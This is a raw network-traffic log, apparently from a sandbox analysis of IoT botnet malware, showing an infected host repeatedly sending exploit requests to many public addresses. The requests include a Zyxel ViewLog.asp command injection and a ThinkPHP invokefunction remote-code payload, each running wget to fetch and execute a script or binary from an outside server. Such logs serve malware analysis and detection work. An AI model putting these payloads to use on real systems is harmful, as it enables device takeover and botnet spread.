                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:33.112339020 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:16.119189024 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      418192.168.2.153363285.70.246.1688080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.661531925 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:50.885072947 CET502INHTTP/1.1 400 Bad Request
                                                      Date: Wed, 14 Feb 2024 08:29:50 GMT
                                                      Server: Apache/2.4.25 (Raspbian)
                                                      Content-Length: 306
                                                      Connection: close
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 52 61 73 70 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.25 (Raspbian) Server at 192.168.0.14 Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      419192.168.2.153586862.29.72.638080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.711884022 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      420192.168.2.154252694.120.149.1028080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:50.720237970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      421192.168.2.154273088.99.64.8680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:51.033750057 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:51.236901999 CET502INHTTP/1.1 400 Bad Request
                                                      Content-Type: text/html; charset=us-ascii
                                                      Server: Microsoft-HTTPAPI/2.0
                                                      Date: Wed, 14 Feb 2024 08:29:50 GMT
                                                      Connection: close
                                                      Content-Length: 311
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      422192.168.2.154378095.101.247.12780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:51.437944889 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:51.636704922 CET480INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 258
                                                      Expires: Wed, 14 Feb 2024 08:29:51 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 64 35 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 31 26 23 34 36 3b 34 62 36 35 66 34 66 31 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;d5b0f748&#46;1707899391&#46;4b65f4f1</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      423192.168.2.154522895.101.200.9780
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:51.448153019 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:51.653476954 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:29:51 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 66 30 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 31 26 23 34 36 3b 32 37 38 64 64 31 66 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;ef01002&#46;1707899391&#46;278dd1fb</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      424192.168.2.155570688.98.53.19680
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:51.454163074 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:52.569446087 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:53.885410070 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:56.505330086 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:01.881171942 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:12.376857042 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:30:35.160269976 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:31:18.166987896 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      425192.168.2.154851695.100.189.2580
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:51.661319017 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: /
                                                      User-Agent: Uirusu/2.0
                                                      Feb 14, 2024 09:29:51.886717081 CET479INHTTP/1.0 400 Bad Request
                                                      Server: AkamaiGHost
                                                      Mime-Version: 1.0
                                                      Content-Type: text/html
                                                      Content-Length: 257
                                                      Expires: Wed, 14 Feb 2024 08:29:51 GMT
                                                      Date: Wed, 14 Feb 2024 08:29:51 GMT
                                                      Connection: close
                                                      Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 37 64 31 66 35 35 37 26 23 34 36 3b 31 37 30 37 38 39 39 33 39 31 26 23 34 36 3b 31 30 32 36 30 66 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                      Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a7d1f557&#46;1707899391&#46;10260f6</BODY></HTML>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      426192.168.2.155233494.111.57.2158080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.439925909 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      427192.168.2.154530631.136.130.1338080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.662767887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:53.337446928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:54.713449955 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:29:57.529315948 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:03.161195993 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:14.168926954 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:30:37.208270073 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                      Feb 14, 2024 09:31:22.263025045 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
                                                      Content-Length: 227
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                      Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      428192.168.2.155027485.160.68.1848080
                                                      TimestampBytes transferredDirectionData
                                                      Feb 14, 2024 09:29:52.669883013 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                      Host: 192.168.0.14:80
                                                      Connection: keep-alive
                                                      Accept-Encoding: gzip, deflate
                                                      Accept: */*
                                                      User-Agent: python-requests/2.20.0
